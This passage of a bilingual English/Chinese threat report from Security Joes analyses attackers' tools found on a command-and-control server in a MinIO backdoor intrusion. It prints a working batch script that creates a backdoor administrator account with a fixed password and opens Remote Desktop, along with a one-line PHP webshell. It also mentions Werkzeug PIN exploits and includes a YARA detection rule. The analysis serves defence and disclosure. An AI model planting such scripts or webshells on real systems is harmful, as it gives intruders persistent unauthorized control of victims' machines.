除了前面概述的工具包之外，我们对网络基础设施的分析还揭示了一系列补充文件，每个文件都经过精心设计，以在入侵过程中扮演不同的角色。下一节将对这些工具进行详尽的检查，全面了解它们在更广泛的入侵策略中各自的功能和角色。

Windows Account Creation Script
窗口帐户创建脚本

As highlighted by MITRE, threat actors often establish accounts as a means to sustain access to victim systems. This strategic maneuver enables adversaries to establish secondary, credentialed access that sidesteps the need to deploy persistent remote access tools onto the compromised system.
正如MITRE所强调的那样，威胁行为者经常建立帐户作为维持对受害者系统的访问的手段。这种战略策略使对手能够建立辅助的、有凭据的访问，从而避免将持久性远程访问工具部署到受感染系统上的需要。

In alignment with this technique, our investigation has brought to light two distinct versions of a Windows script named “adduser.bat” hosted on the c2 server. Our analysis reveals that these scripts are designed to create user accounts on the compromised system. Notably, the usernames created differ between the two script versions – “support” and “servicemanager” respectively. However, it’s important to highlight that the password used for these newly created accounts remains consistent: “QWEqwe123!!!”.
根据这种技术，我们的调查揭示了托管在c2服务器上的名为“adduser.bat”的Windows脚本的两个不同版本。我们的分析表明，这些脚本旨在在受感染的系统上创建用户帐户。值得注意的是，创建的用户名在两个脚本版本之间有所不同 – 分别是“支持”和“服务管理器”。但是，重要的是要强调用于这些新创建的帐户的密码保持一致：“QWEqwe123!!”。

In essence, the script initiates the creation of a new user account, subsequently integrating this account into both the “Remote Desktop Users” and “Administrators” groups. The script then proceeds to modify the Windows Registry to enable Remote Desktop connections, and simultaneously establishes a Windows Firewall rule to facilitate the necessary traffic for Remote Desktop connections. As shown in the code below:
实质上，该脚本启动新用户帐户的创建，随后将此帐户集成到“远程桌面用户”和“管理员”组中。然后，该脚本继续修改 Windows 注册表以启用远程桌面连接，并同时建立 Windows 防火墙规则以方便远程桌面连接所需的流量。如下面的代码所示：

net user support QWEqwe123!!! /add
net localgroup "Remote Desktop Users" support /add
net localgroup "Administrators" support /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

 

PING Scan Script 平扫描脚本

Another tool that surfaced during our analysis is a Python script which leverages asynchronous programming through asyncio Python module. This script is designed to facilitate asynchronous ping functionality, accomplished by dispatching ICMP (Internet Control Message Protocol) echo requests to a designated host address. The primary purpose of this operation is to gauge the round-trip times (RTTs) and ascertain the accessibility of the target host.
在我们的分析过程中出现的另一个工具是一个Python脚本，它通过asyncio Python模块利用异步编程。此脚本旨在促进异步 ping 功能，通过将 ICMP（互联网控制消息协议）回显请求调度到指定的主机地址来实现。此操作的主要目的是测量往返时间 （RTT） 并确定目标主机的可访问性。

In the hands of the attacker, this script serves as a valuable resource for comprehending the layout of the compromised network. Its usage extends to identifying accessible assets within the network, potentially paving the way for lateral movement within the compromised environment.
在攻击者手中，此脚本是理解受感染网络布局的宝贵资源。它的用途扩展到识别网络中的可访问资产，可能为在受感染环境中横向移动铺平道路。

China Chopper Vibes 中国菜刀共鸣

Lastly, but certainly not to be overlooked, is the identification of a one-line webshell adhering to the China Chopper style. While the backdoor used by the threat actor during the intrusion leverages the exploitation of MinIO and does not necessitate an external PHP script for its execution, it’s imperative to underscore the range of tools at the disposal of the threat actor. These tools can potentially be employed to compromise additional environments that may not necessarily have any direct link to MinIO. This observation accentuates the threat actor’s versatility and emphasizes the need for a comprehensive security posture that remains vigilant against various vectors of attack.
最后，但肯定不容忽视的是，坚持中国菜刀风格的单行网壳的识别。虽然威胁参与者在入侵期间使用的后门利用了 MinIO 的利用，并且不需要外部 PHP 脚本来执行，但必须强调威胁参与者可以使用的工具范围。这些工具可能被用来破坏可能不一定与 MinIO 有任何直接链接的其他环境。这一观察强调了威胁行为者的多功能性，并强调需要全面的安全态势，对各种攻击媒介保持警惕。

<?php echo shell_exec($_GET["run"]) ?>

 

Inspecting The C2 Server 检查 C2 服务器

The threat actor had chosen C2 server with a number of open ports listed in the table above. Each is being used for different type of administrative actions. The most interesting channels our team interacted with were 80 and 443 to download various tools through means of fuzzing directories and files, however port 10007 wasn’t of a common C2 administrative interfaces we usually see hence it caught our attention as well.
威胁参与者选择了具有上表中列出的许多开放端口的 C2 服务器。每个都用于不同类型的管理操作。我们团队互动的最有趣的渠道是 80 和 443，通过模糊化目录和文件下载各种工具，但是端口 10007 不是我们通常看到的常见 C2 管理界面，因此它也引起了我们的注意。

Werkzeug is a utility library for the Python programming language that provides essential tools for building web applications. It is commonly used as a foundational component in various web frameworks, including Flask, one of the most popular and lightweight web frameworks in Python.

Werkzeug has an interactive console which we found during the assessment. The console was found to be locked with PIN.
Werkzeug有一个交互式控制台，我们在评估过程中发现了它。发现控制台已使用 PIN 锁定。

Our Red Team highlighted a few articles showcasing a possible access. Looking into them we were able to find several Werkzeug vulnerabilities, in particular around the PIN authentication. This writeup, for example, is referring to a PoC of Path Traversal to achieve code execution. A 2 years old reference for the PIN exploit, including a Python code PoC, can also be found here.
我们的红队重点介绍了几篇展示可能访问的文章。通过研究它们，我们能够发现几个Werkzeug漏洞，特别是在PIN身份验证方面。例如，这篇文章指的是路径遍历的PoC来实现代码执行。PIN漏洞的2年前参考，包括Python代码PoC，也可以在这里找到。

One might also refer to the Werkzeug code repo to find vulnerabilities that may assist them in getting access into the C2 server.
人们也可以参考 Werkzeug 代码存储库来查找可能有助于他们访问 C2 服务器的漏洞。

Note: It’s important to stress that Security Joes does not practice offensive of C2 servers and are delicately collecting information from open-sources. We urge to use the information above with caution!
注意：需要强调的是，Security Joes 不会对 C2 服务器进行攻击，而是从开源中精心收集信息。我们敦促谨慎使用上述信息！

Indicators of Compromise 妥协指标

You can get the complete list of indicators in the following link.
您可以在以下链接中获取指标的完整列表。

 

TTPs TTP

The following is the list of TTPs according to MITRE:
以下是根据MITRE的TTP列表：

Yara Rules 雅苒规则

rule Lin_Go_Evil_Minio {
	meta:
		author = "Felipe Duarte, Security Joes"
		description = "Detects EvilMinIO Backdoor"
sha256_reference = "42AAACF6871108A45E1AE8EDE15BC7CDCB9CF9EDE067059524BA8D3B8928E91C"
	strings:
		$str1 = { 4? c7 44 ?? ?? 09 00 00 00 4? 8d 15 ?? ?? ?? ?? 4? 89 54 ?? ?? 4? c7 44 ?? ?? 02 00 00 00 44 0f 11 7c ?? ?? 44 0f 11 7c ?? ?? 4? 8b 54 ?? ?? 4? 8b 44 ?? ?? 4? 89 54 ?? ?? 4? 89 44 ?? ?? 4? 89 44 ?? ?? 4? 89 5c ?? ?? 4? 8b 44 ?? ?? 4? 8b 5c ?? ?? 4? 8d 4c ?? ?? b? 02 00 00 00 4? 89 fe e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 66 90 4? 85 ff 74 ?? }
		$str2 = "github.com/minio/minio/cmd/x.go"

	condition:
		all of them
}

Victimology 受害者学

As we were encountering only one incident and are new to this attack vector and its distribution, we’ve searches solutions like Shodan to encompass the level of global risk and found over 50,000 installations that were identified as a MinIO distribution.
由于我们只遇到一个事件，并且对这种攻击媒介及其分布不熟悉，因此我们搜索了像 Shodan 这样的解决方案，以涵盖全球风险级别，并发现了超过 50，000 个被确定为 MinIO 分布的安装。

Having said that, Shodan was also able to identify the versions of minio in at least 20,000 of the cases as non-vulnerable. This still leaves a large amount of instances in the fog, not including those who were not identified by Shodan. It is important to stress that like MinIO, there are other non-native Object Storage services, versions and distributions to explore.
话虽如此，Shodan还能够在至少20，000个案例中将minio的版本识别为非脆弱的。这仍然在迷雾中留下了大量的实例，不包括那些没有被Shodan识别的实例。需要强调的是，与 MinIO 一样，还有其他非原生对象存储服务、版本和发行版可供探索。

 

Conclusions 结论

The growing popularity of non-native object storage solutions is evident across various industry trends. Open-source platforms like MinIO have been especially appealing to a broad spectrum of users, from startups to large enterprises, thanks to the flexibility and independence they offer from specific cloud ecosystems. However, this open-source nature also poses a significant security risk when these solutions are downloaded from unofficial or compromised sources.
非原生对象存储解决方案的日益普及在各种行业趋势中显而易见。像MinIO这样的开源平台对从初创公司到大型企业的广泛用户特别有吸引力，这要归功于它们提供的独立于特定云生态系统的灵活性和独立性。但是，当这些解决方案从非官方或受损来源下载时，这种开源性质也会带来重大的安全风险。

Simultaneously, the shift towards multi-cloud strategies among organizations further amplifies the importance of non-native storage solutions. These solutions offer the freedom to operate across different cloud providers but also broaden the potential attack surface, thereby increasing the security risks involved.
同时，组织之间向多云战略的转变进一步放大了非本机存储解决方案的重要性。这些解决方案提供了跨不同云提供商操作的自由，但也扩大了潜在的攻击面，从而增加了所涉及的安全风险。

Community engagement on platforms like GitHub further corroborates the widespread adoption of these non-native solutions. A vibrant and active community often translates into better support and quicker issue resolution but can also attract increased scrutiny from malicious actors looking for vulnerabilities to exploit.
GitHub 等平台上的社区参与进一步证实了这些非原生解决方案的广泛采用。一个充满活力和活跃的社区通常会转化为更好的支持和更快的问题解决，但也可能吸引恶意行为者的更多审查，寻找可以利用的漏洞。

The rise in partnerships and integrations, such as those with Kubernetes, Prometheus, and Grafana, not only extends the reach and adoption of non-native object storage but also adds another layer of complexity to the security landscape. Each integration point potentially serves as an additional attack vector, increasing the stakes for ensuring robust security measures.
合作伙伴关系和集成的兴起，例如与Kubernetes，Prometheus和Grafana的合作伙伴关系和集成，不仅扩展了非本机对象存储的范围和采用，而且还为安全领域增加了另一层复杂性。每个集成点都可能充当额外的攻击媒介，从而增加了确保可靠安全措施的风险。

In summary, while non-native object storage solutions offer compelling benefits like flexibility, scalability, and freedom from vendor lock-in, they also come with an array of security challenges. These risks are magnified when such solutions are acquired from less-than-reliable sources or integrated into complex, multi-cloud environments. Therefore, a concerted effort focused on security best practices is crucial for organizations adopting these technologies.
总之，虽然非原生对象存储解决方案提供了令人信服的优势，如灵活性、可扩展性和摆脱供应商锁定的自由，但它们也带来了一系列安全挑战。当此类解决方案从不太可靠的来源获得或集成到复杂的多云环境中时，这些风险就会被放大。因此，专注于安全最佳实践的共同努力对于采用这些技术的组织至关重要。

原文始发于securityjoes：New Attack Vector In The Cloud: Attackers caught exploiting Object Storage Services